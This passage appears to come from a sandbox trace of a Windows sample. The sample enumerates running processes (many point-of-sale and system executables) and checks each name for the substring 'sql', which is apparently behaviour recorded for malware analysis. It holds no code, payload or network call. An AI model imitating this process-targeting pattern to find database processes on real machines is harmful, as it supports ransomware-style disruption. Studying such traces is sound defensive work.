lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.308] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35831d0 [0129.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35831d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0129.308] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0129.308] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0129.308] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0129.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.310] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583248 [0129.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3583248, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0129.310] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0129.310] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0129.310] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0129.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.311] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583110 [0129.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3583110, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0129.311] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0129.311] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0129.311] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0129.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.312] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596908 [0129.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3596908, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0129.312] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0129.312] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0129.312] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0129.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.314] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35831e8 [0129.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x35831e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0129.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0129.314] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0129.314] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0129.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.315] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583200 [0129.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3583200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0129.315] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0129.315] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0129.315] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0129.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.316] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3596a88 [0129.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0129.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0129.316] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0129.316] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0129.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.318] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583038 [0129.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3583038, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0129.318] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0129.318] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0129.318] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0129.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.319] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35832c0 [0129.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35832c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0129.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0129.319] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0129.319] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0129.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.320] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583080 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3583080, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0129.761] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0129.761] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0129.761] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0129.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.762] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35829f0 [0129.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35829f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0129.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0129.762] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0129.762] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0129.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.764] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3582bb8 [0129.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3582bb8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0129.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0129.764] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0129.764] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0129.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.765] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582c00 [0129.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3582c00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0129.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0129.765] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0129.765] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.767] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582a08 [0129.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582a08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0129.767] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0129.767] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0129.767] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0129.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.768] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583218 [0129.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0129.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0129.769] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0129.769] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0129.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.770] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583260 [0129.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3583260, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0129.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0129.770] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0129.770] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0129.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.771] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583278 [0129.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3583278, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0129.771] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0129.771] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sql") returned 0x0 [0129.771] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0129.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.772] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583098 [0129.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3583098, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0129.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0129.772] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0129.772] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0129.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0129.774] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3596748 [0129.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3596748, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0129.774] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0129.774] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sql") returned 0x0 [0129.774] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0129.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.775] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35968a8 [0129.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x35968a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0129.775] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0129.775] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0129.775] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0129.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0129.776] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3585968 [0129.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x3585968, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0129.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0129.776] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="sql") returned 0x0 [0129.776] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0129.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.777] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583008 [0129.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583008, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0129.777] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0129.778] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0129.778] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0129.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.779] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583230 [0129.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583230, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0129.779] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0129.779] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0129.779] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 